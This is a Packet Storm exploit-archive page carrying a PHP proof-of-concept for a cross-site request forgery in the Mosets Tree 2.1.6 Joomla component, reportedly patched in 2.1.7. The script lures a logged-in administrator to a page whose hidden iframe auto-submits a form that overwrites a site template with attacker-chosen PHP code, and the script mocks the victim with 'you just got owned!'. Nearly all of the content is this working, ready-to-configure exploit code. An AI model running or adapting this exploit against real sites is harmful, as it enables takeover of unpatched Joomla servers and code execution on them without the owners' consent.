the original cloud security

Mosets Tree 2.1.6 Cross Site Request Forgery

Mosets Tree 2.1.6 Cross Site Request Forgery
Posted Nov 19, 2010
Authored by jdc

Mosets Tree version 2.1.6 template overwrite cross site request forgery exploit.

tags | exploit, csrf
MD5 | c4941f531cee980160f0bc45d327a0e4

Mosets Tree 2.1.6 Cross Site Request Forgery

Change Mirror Download
<?php
/**
* Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
* 3 October 2010
* jdc
*
* How it works - admin template form has no nonce
* How to exploit - get a logged in admin to click the wrong link ;)
* Patched in 2.1.7
*/
// change these
$target = 'http://localhost/joomla';
$exploit = '<?php echo phpinfo(); ?>';
/* page - any one of:
page_addCategory
page_addListing
page_advSearchRedirect
page_advSearchResults
page_advSearch
page_claim
page_confirmDelete
page_contactOwner
page_errorListing
page_error
page_gallery
page_image
page_index
page_listAlpha
page_listing
page_listListings
page_ownerListing
page_print
page_recommend
page_replyReview
page_reportReview
page_report
page_searchByResults
page_searchResults
page_subCatIndex
page_usersFavourites
page_usersReview
page_writeReview
sub_alphaIndex
sub_images
sub_listingDetails
sub_listings
sub_listingSummary
sub_map
sub_reviews
sub_subCats
*/
$page = 'page_print';
// don't change these
$path = '/administrator/index.php';
$data = array(
'pagecontent' => $exploit,
'template' => 'm2',
'option' => 'com_mtree',
'task' => 'save_templatepage',
'page' => $page
);
?>
<html>
<body>
<?php if (@$_GET['iframe']) : ?>
<form id="csrf" action="<?php echo $target.$path; ?>" method="post">
<?php foreach ($data as $k => $v) : ?>
<input type="text" value="<?php echo htmlspecialchars($v); ?>"
name="<?php echo $k; ?>" />
<?php endforeach; ?>
<script type="text/javascript">
document.forms[0].submit();
</script>
</form>
<?php else : ?>
<h1>Mosets Tree 2.1.6 Template Overwrite CSRF Exploit</h1>
<p>If you were logged in as admin, you just got owned!</p>
<div style="display:none">
<iframe width="1" height="1" src="<?php __FILE__; ?>?iframe=1"></iframe>
</div>
<?php endif; ?>
</body>
</html>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close